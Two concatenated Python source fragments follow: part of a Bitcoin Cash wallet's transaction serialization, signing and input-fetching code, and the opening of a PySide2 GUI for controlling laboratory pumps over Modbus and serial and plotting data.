assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self = klass(None)
self._inputs = inputs
self._outputs = outputs.copy()
self.locktime = locktime
self.set_sign_schnorr(sign_schnorr)
return self
@classmethod
def pay_script(self, output):
return output.to_script().hex()
@classmethod
def estimate_pubkey_size_from_x_pubkey(cls, x_pubkey):
try:
if x_pubkey[0:2] in ['02', '03']: # compressed pubkey
return 0x21
elif x_pubkey[0:2] == '04': # uncompressed pubkey
return 0x41
elif x_pubkey[0:2] == 'ff': # bip32 extended pubkey
return 0x21
elif x_pubkey[0:2] == 'fe': # old electrum extended pubkey
return 0x41
except Exception as e:
pass
return 0x21 # just guess it is compressed
@classmethod
def estimate_pubkey_size_for_txin(cls, txin):
pubkeys = txin.get('pubkeys', [])
x_pubkeys = txin.get('x_pubkeys', [])
if pubkeys and len(pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(pubkeys[0])
elif x_pubkeys and len(x_pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(x_pubkeys[0])
else:
return 0x21 # just guess it is compressed
@classmethod
def get_siglist(self, txin, estimate_size=False, sign_schnorr=False):
# if we have enough signatures, we use the actual pubkeys
# otherwise, use extended pubkeys (with bip32 derivation)
num_sig = txin.get('num_sig', 1)
if estimate_size:
pubkey_size = self.estimate_pubkey_size_for_txin(txin)
pk_list = ["00" * pubkey_size] * len(txin.get('x_pubkeys', [None]))
# we assume that signature will be 0x48 bytes long if ECDSA, 0x41 if Schnorr
if sign_schnorr:
siglen = 0x41
else:
siglen = 0x48
sig_list = [ "00" * siglen ] * num_sig
else:
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
is_complete = len(signatures) == num_sig
if is_complete:
pk_list = pubkeys
sig_list = signatures
else:
pk_list = x_pubkeys
sig_list = [sig if sig else NO_SIGNATURE for sig in x_signatures]
return pk_list, sig_list
@classmethod
def input_script(self, txin, estimate_size=False, sign_schnorr=False):
# For already-complete transactions, scriptSig will be set and we prefer
# to use it verbatim in order to get an exact reproduction (including
# malleated push opcodes, etc.).
scriptSig = txin.get('scriptSig', None)
if scriptSig is not None:
return scriptSig
# For partially-signed inputs, or freshly signed transactions, the
# scriptSig will be missing and so we construct it from pieces.
_type = txin['type']
if _type == 'coinbase':
raise RuntimeError('Attempted to serialize coinbase with missing scriptSig')
pubkeys, sig_list = self.get_siglist(txin, estimate_size, sign_schnorr=sign_schnorr)
script = ''.join(push_script(x) for x in sig_list)
if _type == 'p2pk':
pass
elif _type == 'p2sh':
# put op_0 before script
script = '00' + script
redeem_script = multisig_script(pubkeys, txin['num_sig'])
script += push_script(redeem_script)
elif _type == 'p2pkh':
script += push_script(pubkeys[0])
elif _type == 'unknown':
raise RuntimeError('Cannot serialize unknown input with missing scriptSig')
return script
@classmethod
def is_txin_complete(cls, txin):
if txin['type'] == 'coinbase':
return True
num_sig = txin.get('num_sig', 1)
if num_sig == 0:
return True
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
return len(signatures) == num_sig
@classmethod
def get_preimage_script(self, txin):
_type = txin['type']
if _type == 'p2pkh':
return txin['address'].to_script().hex()
elif _type == 'p2sh':
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
return multisig_script(pubkeys, txin['num_sig'])
elif _type == 'p2pk':
pubkey = txin['pubkeys'][0]
return public_key_to_p2pk_script(pubkey)
elif _type == 'unknown':
# this approach enables most P2SH smart contracts (but take care if using OP_CODESEPARATOR)
return txin['scriptCode']
else:
raise RuntimeError('Unknown txin type', _type)
@classmethod
def serialize_outpoint(self, txin):
return bh2u(bfh(txin['prevout_hash'])[::-1]) + int_to_hex(txin['prevout_n'], 4)
@classmethod
def serialize_input(self, txin, script, estimate_size=False):
# Prev hash and index
s = self.serialize_outpoint(txin)
# Script length, script, sequence
s += var_int(len(script)//2)
s += script
s += int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
# offline signing needs to know the input value
if ('value' in txin
and txin.get('scriptSig') is None
and not (estimate_size or self.is_txin_complete(txin))):
s += int_to_hex(txin['value'], 8)
return s
def BIP_LI01_sort(self):
# See https://github.com/kristovatlas/rfc/blob/master/bips/bip-li01.mediawiki
self._inputs.sort(key = lambda i: (i['prevout_hash'], i['prevout_n']))
self._outputs.sort(key = lambda o: (o[2], self.pay_script(o[1])))
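# Example ordering (illustrative): after BIP_LI01_sort(), inputs are ordered by
# (prevout_hash, prevout_n) and outputs by (amount, scriptPubKey hex), both ascending,
# so an output of 1000 sats always precedes one of 50000 sats regardless of the order
# in which they were added.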
def serialize_output(self, output):
output_type, addr, amount = output
s = int_to_hex(amount, 8)
script = self.pay_script(addr)
s += var_int(len(script)//2)
s += script
return s
@classmethod
def nHashType(cls):
'''Hash type in hex.'''
warnings.warn("warning: deprecated tx.nHashType()", FutureWarning, stacklevel=2)
return 0x01 | (cls.SIGHASH_FORKID + (cls.FORKID << 8))
def invalidate_common_sighash_cache(self):
''' Call this to invalidate the cached common sighash (computed by
`calc_common_sighash` below).
This function is for advanced usage of this class where the caller
has mutated the transaction after computing its signatures and would
like to explicitly delete the cached common sighash. See
`calc_common_sighash` below. '''
try: del self._cached_sighash_tup
except AttributeError: pass
def calc_common_sighash(self, use_cache=False):
""" Calculate the common sighash components that are used by
transaction signatures. If `use_cache` enabled then this will return
already-computed values from the `._cached_sighash_tup` attribute, or
compute them if necessary (and then store).
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Returns three 32-long bytes objects: (hashPrevouts, hashSequence, hashOutputs).
Warning: If you modify non-signature parts of the transaction
afterwards, this cache will be wrong! """
inputs = self.inputs()
outputs = self.outputs()
meta = (len(inputs), len(outputs))
if use_cache:
try:
cmeta, res = self._cached_sighash_tup
except AttributeError:
pass
else:
# minimal heuristic check to detect bad cached value
if cmeta == meta:
# cache hit and heuristic check ok
return res
else:
del cmeta, res, self._cached_sighash_tup
hashPrevouts = Hash(bfh(''.join(self.serialize_outpoint(txin) for txin in inputs)))
hashSequence = Hash(bfh(''.join(int_to_hex(txin.get('sequence', 0xffffffff - 1), 4) for txin in inputs)))
hashOutputs = Hash(bfh(''.join(self.serialize_output(o) for o in outputs)))
res = hashPrevouts, hashSequence, hashOutputs
# cache the resulting value, along with some minimal metadata to defensively
# program against cache invalidation (due to class mutation).
self._cached_sighash_tup = meta, res
return res
def serialize_preimage(self, i, nHashType=0x00000041, use_cache = False):
""" See `.calc_common_sighash` for explanation of use_cache feature """
if (nHashType & 0xff) != 0x41:
raise ValueError("other hashtypes not supported; submit a PR to fix this!")
nVersion = int_to_hex(self.version, 4)
nHashType = int_to_hex(nHashType, 4)
nLocktime = int_to_hex(self.locktime, 4)
txin = self.inputs()[i]
outpoint = self.serialize_outpoint(txin)
preimage_script = self.get_preimage_script(txin)
scriptCode = var_int(len(preimage_script) // 2) + preimage_script
try:
amount = int_to_hex(txin['value'], 8)
except KeyError:
raise InputValueMissing
nSequence = int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
hashPrevouts, hashSequence, hashOutputs = self.calc_common_sighash(use_cache = use_cache)
preimage = nVersion + bh2u(hashPrevouts) + bh2u(hashSequence) + outpoint + scriptCode + amount + nSequence + bh2u(hashOutputs) + nLocktime + nHashType
return preimage
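# For reference, the preimage assembled above follows the BIP143-style layout used for
# SIGHASH_FORKID signing:
#   nVersion | hashPrevouts | hashSequence | outpoint | scriptCode | amount |
#   nSequence | hashOutputs | nLocktime | nHashType
# with integers little-endian and the three hashes being the double-SHA256 digests
# returned by calc_common_sighash().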
def serialize(self, estimate_size=False):
nVersion = int_to_hex(self.version, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txins = var_int(len(inputs)) + ''.join(self.serialize_input(txin, self.input_script(txin, estimate_size, self._sign_schnorr), estimate_size) for txin in inputs)
txouts = var_int(len(outputs)) + ''.join(self.serialize_output(o) for o in outputs)
return nVersion + txins + txouts + nLocktime
def hash(self):
warnings.warn("warning: deprecated tx.hash()", FutureWarning, stacklevel=2)
return self.txid()
def txid(self):
if not self.is_complete():
return None
ser = self.serialize()
return self._txid(ser)
def txid_fast(self):
''' Returns the txid by immediately calculating it from self.raw,
which is faster than calling txid() which does a full re-serialize
each time. Note this should only be used for tx's that you KNOW are
complete and that don't contain our funny serialization hacks.
(The is_complete check is also not performed here because that
potentially can lead to unwanted tx deserialization). '''
if self.raw:
return self._txid(self.raw)
return self.txid()
@staticmethod
def _txid(raw_hex : str) -> str:
return bh2u(Hash(bfh(raw_hex))[::-1])
def add_inputs(self, inputs):
self._inputs.extend(inputs)
self.raw = None
def add_outputs(self, outputs):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self._outputs.extend(outputs)
self.raw = None
def input_value(self):
''' Will return the sum of all input values, if the input values
are known (may consult self.fetched_inputs() to get a better idea of
possible input values). Will raise InputValueMissing if input values
are missing. '''
try:
return sum(x['value'] for x in (self.fetched_inputs() or self.inputs()))
except (KeyError, TypeError, ValueError) as e:
raise InputValueMissing from e
def output_value(self):
return sum(val for tp, addr, val in self.outputs())
def get_fee(self):
''' Try and calculate the fee based on the input data, and returns it as
satoshis (int). Can raise InputValueMissing on tx's where fee data is
missing, so client code should catch that. '''
# first, check if coinbase; coinbase tx always has 0 fee
if self.inputs() and self._inputs[0].get('type') == 'coinbase':
return 0
# otherwise just sum up all values - may raise InputValueMissing
return self.input_value() - self.output_value()
@profiler
def estimated_size(self):
'''Return an estimated tx size in bytes.'''
return (len(self.serialize(True)) // 2 if not self.is_complete() or self.raw is None
else len(self.raw) // 2) # ASCII hex string
@classmethod
def estimated_input_size(self, txin, sign_schnorr=False):
'''Return an estimate of the serialized input size in bytes.'''
script = self.input_script(txin, True, sign_schnorr=sign_schnorr)
return len(self.serialize_input(txin, script, True)) // 2 # ASCII hex string
def signature_count(self):
r = 0
s = 0
for txin in self.inputs():
if txin['type'] == 'coinbase':
continue
signatures = list(filter(None, txin.get('signatures',[])))
s += len(signatures)
r += txin.get('num_sig',-1)
return s, r
def is_complete(self):
s, r = self.signature_count()
return r == s
@staticmethod
def verify_signature(pubkey, sig, msghash, reason=None):
''' Given a pubkey (bytes), signature (bytes -- without sighash byte),
and a sha256d message digest, returns True iff the signature is good
for the given public key, False otherwise. Does not raise normally
unless given bad or garbage arguments.
Optional arg 'reason' should be a list which will have a string pushed
at the front (failure reason) on False return. '''
if (any(not arg or not isinstance(arg, bytes) for arg in (pubkey, sig, msghash))
or len(msghash) != 32):
raise ValueError('bad arguments to verify_signature')
if len(sig) == 64:
# Schnorr signatures are always exactly 64 bytes
return schnorr.verify(pubkey, sig, msghash)
else:
from ecdsa import BadSignatureError, BadDigestError
from ecdsa.der import UnexpectedDER
# ECDSA signature
try:
pubkey_point = ser_to_point(pubkey)
vk = MyVerifyingKey.from_public_point(pubkey_point, curve=SECP256k1)
if vk.verify_digest(sig, msghash, sigdecode = ecdsa.util.sigdecode_der):
return True
except (AssertionError, ValueError, TypeError,
BadSignatureError, BadDigestError, UnexpectedDER) as e:
# ser_to_point will fail if pubkey is off-curve, infinity, or garbage.
# verify_digest may also raise BadDigestError and BadSignatureError
if isinstance(reason, list):
reason.insert(0, repr(e))
except BaseException as e:
print_error("[Transaction.verify_signature] unexpected exception", repr(e))
if isinstance(reason, list):
reason.insert(0, repr(e))
return False
@staticmethod
def _ecdsa_sign(sec, pre_hash):
pkey = regenerate_key(sec)
secexp = pkey.secret
private_key = MySigningKey.from_secret_exponent(secexp, curve = SECP256k1)
public_key = private_key.get_verifying_key()
sig = private_key.sign_digest_deterministic(pre_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_der)
assert public_key.verify_digest(sig, pre_hash, sigdecode = ecdsa.util.sigdecode_der)
return sig
@staticmethod
def _schnorr_sign(pubkey, sec, pre_hash):
pubkey = bytes.fromhex(pubkey)
sig = schnorr.sign(sec, pre_hash)
assert schnorr.verify(pubkey, sig, pre_hash) # verify what we just signed
return sig
def sign(self, keypairs, *, use_cache=False):
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
for j, (pubkey, x_pubkey) in enumerate(zip(pubkeys, x_pubkeys)):
if self.is_txin_complete(txin):
# txin is complete
break
if pubkey in keypairs:
_pubkey = pubkey
kname = 'pubkey'
elif x_pubkey in keypairs:
_pubkey = x_pubkey
kname = 'x_pubkey'
else:
continue
print_error(f"adding signature for input#{i} sig#{j}; {kname}: {_pubkey} schnorr: {self._sign_schnorr}")
sec, compressed = keypairs.get(_pubkey)
self._sign_txin(i, j, sec, compressed, use_cache=use_cache)
print_error("is_complete", self.is_complete())
self.raw = self.serialize()
def _sign_txin(self, i, j, sec, compressed, *, use_cache=False):
'''Note: precondition is self._inputs is valid (ie: tx is already deserialized)'''
pubkey = public_key_from_private_key(sec, compressed)
# add signature
nHashType = 0x00000041 # hardcoded, perhaps should be taken from unsigned input dict
pre_hash = Hash(bfh(self.serialize_preimage(i, nHashType, use_cache=use_cache)))
if self._sign_schnorr:
sig = self._schnorr_sign(pubkey, sec, pre_hash)
else:
sig = self._ecdsa_sign(sec, pre_hash)
reason = []
if not self.verify_signature(bfh(pubkey), sig, pre_hash, reason=reason):
print_error(f"Signature verification failed for input#{i} sig#{j}, reason: {str(reason)}")
return None
txin = self._inputs[i]
txin['signatures'][j] = bh2u(sig + bytes((nHashType & 0xff,)))
txin['pubkeys'][j] = pubkey # needed for fd keys
return txin
def get_outputs(self):
"""convert pubkeys to addresses"""
o = []
for type, addr, v in self.outputs():
o.append((addr,v)) # consider using yield (addr, v)
return o
def get_output_addresses(self):
return [addr for addr, val in self.get_outputs()]
def has_address(self, addr):
return (addr in self.get_output_addresses()) or (addr in (tx.get("address") for tx in self.inputs()))
def is_final(self):
return not any([x.get('sequence', 0xffffffff - 1) < 0xffffffff - 1
for x in self.inputs()])
def as_dict(self):
if self.raw is None:
self.raw = self.serialize()
self.deserialize()
out = {
'hex': self.raw,
'complete': self.is_complete(),
'final': self.is_final(),
}
return out
# This cache stores foreign (non-wallet) tx's we fetched from the network
# for the purposes of the "fetch_input_data" mechanism. Its max size has
# been thoughtfully calibrated to provide a decent tradeoff between
# memory consumption and UX.
#
# In even aggressive/pathological cases this cache won't ever exceed
# 100MB even when full. [see ExpiringCache.size_bytes() to test it].
# This is acceptable considering this is Python + Qt and it eats memory
# anyway.. and also this is 2019 ;). Note that all tx's in this cache
# are in the non-deserialized state (hex encoded bytes only) as a memory
# savings optimization. Please maintain that invariant if you modify this
# code, otherwise the cache may grow to 10x memory consumption if you
# put deserialized tx's in here.
_fetched_tx_cache = ExpiringCache(maxlen=1000, name="TransactionFetchCache")
def fetch_input_data(self, wallet, done_callback=None, done_args=tuple(),
prog_callback=None, *, force=False, use_network=True):
'''
Fetch all input data and put it in the 'ephemeral' dictionary, under
'fetched_inputs'. This call potentially initiates fetching of
prevout_hash transactions from the network for all inputs to this tx.
The fetched data is basically used for the Transaction dialog to be able
to display fee, actual address, and amount (value) for tx inputs.
`wallet` should ideally have a network object, but this function still
will work and is still useful if it does not.
`done_callback` is called with `done_args` (only if True was returned),
upon completion. Note that done_callback won't be called if this function
returns False. Also note that done_callback runs in a non-main thread
context and as such, if you want to do GUI work from within it, use
the appropriate Qt signal/slot mechanism to dispatch work to the GUI.
`prog_callback`, if specified, is called periodically to indicate
progress after inputs are retrieved, and it is passed a single arg,
"percent" (eg: 5.1, 10.3, 26.3, 76.1, etc) to indicate percent progress.
Note 1: Results (fetched transactions) are cached, so subsequent
calls to this function for the same transaction are cheap.
Note 2: Multiple, rapid calls to this function will cause the previous
asynchronous fetch operation (if active) to be canceled and only the
latest call will result in the invocation of the done_callback if/when
it completes.
'''
if not self._inputs:
return False
if force:
# forced-run -- start with empty list
inps = []
else:
# may be a new list or list that was already in dict
inps = self.fetched_inputs(require_complete = True)
if len(self._inputs) == len(inps):
# we already have results, don't do anything.
return False
eph = self.ephemeral
eph['fetched_inputs'] = inps = inps.copy() # paranoia: in case another thread is running on this list
# Lazy imports to keep this functionality very self-contained
# These modules are always available so no need to globally import them.
import threading
import queue
import time
from copy import deepcopy
from collections import defaultdict
t0 = time.time()
t = None
cls = __class__
self_txid = self.txid()
def doIt():
'''
This function is seemingly complex, but it's really conceptually
simple:
1. Fetch all prevouts either from cache (wallet or global tx_cache)
2. Or, if they aren't in either cache, then we will asynchronously
queue the raw tx gets to the network in parallel, across *all*
our connected servers. This is very fast, and spreads the load
around.
Tested with a huge tx of 600+ inputs all coming from different
prevout_hashes on mainnet, and it's super fast:
cd8fcc8ad75267ff9ad314e770a66a9e871be7882b7c05a7e5271c46bfca98bc '''
last_prog = -9999.0
need_dl_txids = defaultdict(list) # the dict of txids we will need to download (wasn't in cache)
def prog(i, prog_total=100):
''' notify interested code about progress '''
nonlocal last_prog
if prog_callback:
prog = ((i+1)*100.0)/prog_total
if prog - last_prog > 5.0:
prog_callback(prog)
last_prog = prog
while eph.get('_fetch') == t and len(inps) < len(self._inputs):
i = len(inps)
inp = deepcopy(self._inputs[i])
typ, prevout_hash, n, addr, value = inp.get('type'), inp.get('prevout_hash'), inp.get('prevout_n'), inp.get('address'), inp.get('value')
if not prevout_hash or n is None:
raise RuntimeError('Missing prevout_hash and/or prevout_n')
if typ != 'coinbase' and (not isinstance(addr, Address) or value is None):
tx = cls.tx_cache_get(prevout_hash) or wallet.transactions.get(prevout_hash)
if tx:
# Tx was in cache or wallet.transactions, proceed
# note that the tx here should be in the "not
# deserialized" state
if tx.raw:
# Note we deserialize a *copy* of the tx so as to
# save memory. We do not want to deserialize the
# cached tx because if we do so, the cache will
# contain a deserialized tx which will take up
# several times the memory when deserialized due to
# Python's memory use being less efficient than the
# binary-only raw bytes. So if you modify this code
# do bear that in mind.
tx = Transaction(tx.raw)
try:
tx.deserialize()
# The below txid check is commented-out as
# we trust wallet tx's and the network
# tx's that fail this check are never
# put in cache anyway.
#txid = tx._txid(tx.raw)
#if txid != prevout_hash: # sanity check
# print_error("fetch_input_data: cached prevout_hash {} != tx.txid() {}, ignoring.".format(prevout_hash, txid))
except Exception as e:
print_error("fetch_input_data: WARNING failed to deserialize {}: {}".format(prevout_hash, repr(e)))
tx = None
else:
tx = None
print_error("fetch_input_data: WARNING cached tx lacked any 'raw' bytes for {}".format(prevout_hash))
# now, examine the deserialized tx, if it's still good
if tx:
if n < len(tx.outputs()):
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inp['value'] = value
inp['address'] = addr
print_error("fetch_input_data: fetched cached", i, addr, value)
else:
print_error("fetch_input_data: ** FIXME ** should never happen -- n={} >= len(tx.outputs())={} for prevout {}".format(n, len(tx.outputs()), prevout_hash))
else:
# tx was not in cache or wallet.transactions, mark
# it for download below (this branch can also execute
# in the unlikely case where there was an error above)
need_dl_txids[prevout_hash].append((i, n)) # remember the input# as well as the prevout_n
inps.append(inp) # append either cached result or as-yet-incomplete copy of _inputs[i]
# Now, download the tx's we didn't find above if network is available
# and caller said it's ok to go out to the network.. otherwise just return
# what we have
if use_network and eph.get('_fetch') == t and wallet.network:
callback_funcs_to_cancel = set()
try: # the whole point of this try block is the `finally` way below...
prog(-1) # tell interested code that progress is now 0%
# Next, queue the transaction.get requests, spreading them
# out randomly over the connected interfaces
q = queue.Queue()
q_ct = 0
bad_txids = set()
def put_in_queue_and_cache(r):
''' we cache the results directly in the network callback
as even if the user cancels the operation, we would like
to save the returned tx in our cache, since we did the
work to retrieve it anyway. '''
q.put(r) # put the result in the queue no matter what it is
txid = ''
try:
# Below will raise if response was 'error' or
# otherwise invalid. Note: for performance reasons
# we don't validate the tx here or deserialize it as
# this function runs in the network thread and we
# don't want to eat up that thread's CPU time
# needlessly. Also note the cache doesn't store
# deserialized tx's so as to save memory. We
# always deserialize a copy when reading the cache.
tx = Transaction(r['result'])
txid = r['params'][0]
assert txid == cls._txid(tx.raw), "txid-is-sane-check" # protection against phony responses
cls.tx_cache_put(tx=tx, txid=txid) # save tx to cache here
except Exception as e:
# response was not valid, ignore (don't cache)
if txid: # txid may be '' if KeyError from r['result'] above
bad_txids.add(txid)
print_error("fetch_input_data: put_in_queue_and_cache fail for txid:", txid, repr(e))
for txid, l in need_dl_txids.items():
wallet.network.queue_request('blockchain.transaction.get', [txid],
interface='random',
callback=put_in_queue_and_cache)
callback_funcs_to_cancel.add(put_in_queue_and_cache)
q_ct += 1
def get_bh():
if eph.get('block_height'):
return False
lh = wallet.network.get_server_height() or wallet.get_local_height()
def got_tx_info(r):
q.put('block_height') # indicate to other thread we got the block_height reply from network
try:
confs = r.get('result').get('confirmations', 0) # will raise on error reply
if confs and lh:
# the whole point.. was to get this piece of data.. the block_height
eph['block_height'] = bh = lh - confs + 1
print_error('fetch_input_data: got tx block height', bh)
else:
print_error('fetch_input_data: tx block height could not be determined')
except Exception as e:
print_error('fetch_input_data: get_bh fail:', str(e), r)
if self_txid:
wallet.network.queue_request('blockchain.transaction.get', [self_txid,True],
interface=None, callback=got_tx_info)
callback_funcs_to_cancel.add(got_tx_info)
return True
if get_bh():
q_ct += 1
class ErrorResp(Exception):
pass
for i in range(q_ct):
# now, read the q back, with a 10 second timeout, and
# populate the inputs
try:
r = q.get(timeout=10)
if eph.get('_fetch') != t:
# early abort from func, canceled
break
if r == 'block_height':
# ignore block_height reply from network.. was already processed in other thread in got_tx_info above
continue
if r.get('error'):
msg = r.get('error')
if isinstance(msg, dict):
msg = msg.get('message') or 'unknown error'
raise ErrorResp(msg)
rawhex = r['result']
txid = r['params'][0]
assert txid not in bad_txids, "txid marked bad" # skip if was marked bad by our callback code
tx = Transaction(rawhex); tx.deserialize()
for item in need_dl_txids[txid]:
ii, n = item
assert n < len(tx.outputs())
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inps[ii]['value'] = value
inps[ii]['address'] = addr
print_error("fetch_input_data: fetched from network", ii, addr, value)
prog(i, q_ct) # tell interested code of progress
except queue.Empty:
print_error("fetch_input_data: timed out after 10.0s fetching from network, giving up.")
break
except Exception as e:
print_error("fetch_input_data:", repr(e))
finally:
# force-cancel any extant requests -- this is especially
# crucial on error/timeout/failure.
for func in callback_funcs_to_cancel:
wallet.network.cancel_requests(func)
if len(inps) == len(self._inputs) and eph.get('_fetch') == t: # sanity check
eph.pop('_fetch', None) # potential race condition here, popping wrong t -- but in practice w/ CPython threading it won't matter
print_error(f"fetch_input_data: elapsed {(time.time()-t0):.4f} sec")
if done_callback:
done_callback(*done_args)
# /doIt
t = threading.Thread(target=doIt, daemon=True)
eph['_fetch'] = t
t.start()
return True
def fetched_inputs(self, *, require_complete=False):
''' Returns the complete list of asynchronously fetched inputs for
this tx, if they exist. If the list is not yet fully retrieved, and
require_complete == False, returns what it has so far
(the returned list will always be exactly equal in length to len(self._inputs),
with not-yet downloaded inputs coming from self._inputs and not
necessarily containing a good 'address' or 'value').
If the download failed completely or was never started, will return the
empty list [].
Note that some inputs may still lack key: 'value' if there was a network
error in retrieving them or if the download is still in progress.'''
if self._inputs:
ret = self.ephemeral.get('fetched_inputs') or []
diff = len(self._inputs) - len(ret)
if diff > 0 and self.ephemeral.get('_fetch') and not require_complete:
# in progress.. so return what we have so far
return ret + self._inputs[len(ret):]
elif diff == 0 and (not require_complete or not self.ephemeral.get('_fetch')):
# finished *or* in-progress and require_complete==False
return ret
return []
def fetch_cancel(self) -> bool:
''' Cancels the currently-active running fetch operation, if any '''
return bool(self.ephemeral.pop('_fetch', None))
@classmethod
def tx_cache_get(cls, txid : str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = cls._fetched_tx_cache.get(txid)
if tx is not None and tx.raw:
# make sure to return a copy of the transaction from the cache
# so that if the caller does .deserialize(), the *caller's* instance
# takes the ~10x memory hit, and not the cached instance, which
# should remain an undeserialized raw tx.
return Transaction(tx.raw)
return None
@classmethod
def tx_cache_put(cls, tx : object, txid : str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
if not tx or not tx.raw:
raise ValueError('Please pass a tx which has a valid .raw attribute!')
txid = txid or cls._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
cls._fetched_tx_cache.put(txid, Transaction(tx.raw))
def tx_from_str(txt):
"json or raw hexadecimal"
import json
txt = txt.strip()
if not txt:
raise ValueError("empty string")
try:
bfh(txt)
is_hex = True
except:
is_hex = False
if is_hex:
return txt
tx_dict = json.loads(str(txt))
assert "hex" in tx_dict.keys()
return tx_dict["hex"]
|
main.py
|
from io import StringIO
from random import randint
import threading
import h5py
import serial
from PySide2.QtCore import QSize, Qt, QAbstractTableModel, Signal, QTimer, QRunnable, Slot, QThreadPool
from PySide2.QtGui import QKeySequence, QSyntaxHighlighter, QTextCharFormat, QPixmap, QImage, QPalette, QColor
from PySide2.QtWebEngineWidgets import QWebEngineView
from PySide2.QtWidgets import QApplication, QMainWindow, QStatusBar, QToolBar, QFileDialog, QTabWidget, QTextEdit, \
QAction
from PySide2.QtWidgets import QVBoxLayout, QScrollArea, QColorDialog, QListWidget, QAbstractItemView, QListWidgetItem
from PySide2.QtWidgets import QLabel, QLineEdit, QGridLayout, QHBoxLayout, QGroupBox, QComboBox, QWidget, QPlainTextEdit
from PySide2.QtWidgets import QMdiArea, QMdiSubWindow, QDockWidget, QTableView, QSizePolicy, QMessageBox, QPushButton
from control_api import PumpMode, Pump, PumpModbusCommandSender, ModbusBuilder, RemoteManger, PortManger
from widgets_builder import NewProjectSetNameDialog, NewTableDialog, ErrorMassage, Label, FileTreeViewer, light, dark
from widgets_builder import CreateNewGraphDialog
from widgets_builder import PumpAbstract, icon, special_characters_detector, StepIncreaseWindow, OpenProjectDialog
import numpy as np
import os
import sys
import pyvisa
import pyqtgraph as pg
MAIN_PROJECTS_SAVED_FILE = "saved_projects"
SUB_MAIN_PROJECTS_SAVED_FILE = ["hsf5-data", 'Graphs', 'Reports', 'Notes', 'Procedure']
if not os.path.exists(MAIN_PROJECTS_SAVED_FILE):
os.mkdir(MAIN_PROJECTS_SAVED_FILE)
class PumpSingleReceiver:
def __init__(self):
self.data = None
self.pump_sender = PumpModbusCommandSender()
self.modbus = ModbusBuilder()
def data_manger(self, parameters):
if parameters['pump_mode'] == PumpMode.DECOUPLED:
if parameters['cmd'] == 'speed':
self.data = self.modbus.build_change_speed(parameters['speed']).get_modbus
elif parameters['cmd'] == 'direction':
self.data = self.modbus.build_flow_direction(parameters['direction']).get_modbus
elif parameters['cmd'] == 'button':
if parameters['button']:
self.data = self.modbus.build_start().get_modbus
else:
self.data = self.modbus.build_stop().get_modbus
port = self.name_filter(parameters['port'])
self.send(port, self.data)
def send(self, send_to, data):
self.pump_sender.send_pump(send_to=send_to, data=data)
def name_filter(self, s):
return s[s.find("(") + 1:-1]
class GraphMaker(QMainWindow):
def __init__(self, title="no title"):
super().__init__()
self.graphWidget = pg.PlotWidget()
self.setCentralWidget(self.graphWidget)
self.graphWidget.setBackground("w")
self.graphWidget.setTitle(title, color="0000", size="10pt")
self.graphWidget.addLegend()
self.graphWidget.showGrid(x=True, y=True)
def plot(self, x_data, y_data, plot_name='no name', color='b', x_axis_name="X Axis", y_axis_name="Y Axis", size=3):
styles = {"color": "0000", "font-size": "20px"}
self.graphWidget.setLabel("left", y_axis_name, **styles)
self.graphWidget.setLabel("bottom", x_axis_name, **styles)
pen = pg.mkPen(color=color, width=size)
self.graphWidget.plot(x_data, y_data, name=plot_name, pen=pen)
class NewGraphAction(QAction):
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.setText("New Figure")
self.setStatusTip("Create New Figure")
self.setIcon(icon("line-graph.png"))
self.database = None
self.color = None
self.CreateNewGraphDialog = None
self.triggered.connect(self.new_triggered)
def create_graph(self):
x_data = self.CreateNewGraphDialog.x_dataset_list_QComboBox.currentText()
y_data = self.CreateNewGraphDialog.y_dataset_list_QComboBox.currentText()
title = self.CreateNewGraphDialog.title_QLineEdit.text()
plot_name = self.CreateNewGraphDialog.plot_name_QLineEdit.text()
x_name = self.CreateNewGraphDialog.x_axis_name_QLineEdit.text()
y_name = self.CreateNewGraphDialog.y_axis_name_QLineEdit.text()
size = self.CreateNewGraphDialog.size_QComboBox.value()
if x_data is not None and y_data is not None:
x_data = self.database.get_one_data_set(x_data)
y_data = self.database.get_one_data_set(y_data)
graph = GraphMaker(title)
graph.plot(x_data=x_data, y_data=y_data, color=self.color, plot_name=plot_name, x_axis_name=x_name,
y_axis_name=y_name, size=size)
self.parent().add_sub_win(graph)
self.CreateNewGraphDialog.parent().hide()
def new_triggered(self):
self.CreateNewGraphDialog = CreateNewGraphDialog()
self.CreateNewGraphDialog.select_color_QPushButton.clicked.connect(self.color_dialog)
self.database = DataBase(self.parent().project_name)
self.CreateNewGraphDialog.x_dataset_list_QComboBox.addItems(self.database.get_list_data_set())
self.CreateNewGraphDialog.y_dataset_list_QComboBox.addItems(self.database.get_list_data_set())
self.parent().add_sub_win(self.CreateNewGraphDialog)
self.CreateNewGraphDialog.save_QPushButton.clicked.connect(self.create_graph)
self.CreateNewGraphDialog.cancel_QPushButton.clicked.connect(self.CreateNewGraphDialog.parent().hide)
def color_dialog(self):
self.color = QColorDialog.getColor()
# ser = serial.Serial(port="COM5", baudrate=9600, timeout=1)
def test_generator():
while True:
try:
ser.write(b'g')
yield ser.read(5).decode('ascii')[:-2]
except Exception as e:
print(e)
yield randint(2, 100)
class MonitorWidget(QMainWindow):
def __init__(self):
super().__init__()
self.graphWidget = pg.PlotWidget()
self.setCentralWidget(self.graphWidget)
self.n = 100
